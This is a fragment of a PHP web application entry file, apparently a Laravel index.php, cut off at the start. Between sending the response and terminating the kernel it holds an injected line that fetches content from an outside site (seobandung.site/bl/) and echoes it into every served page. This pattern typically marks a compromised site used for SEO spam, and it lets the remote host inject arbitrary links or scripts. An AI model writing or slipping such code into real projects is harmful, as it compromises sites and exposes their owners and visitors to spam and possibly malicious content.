make(Kernel::class); $response = $kernel->handle( $request = Request::capture() )->send(); $a = file_get_contents('https://seobandung.site/bl/'); echo $a; $kernel->terminate($request, $response);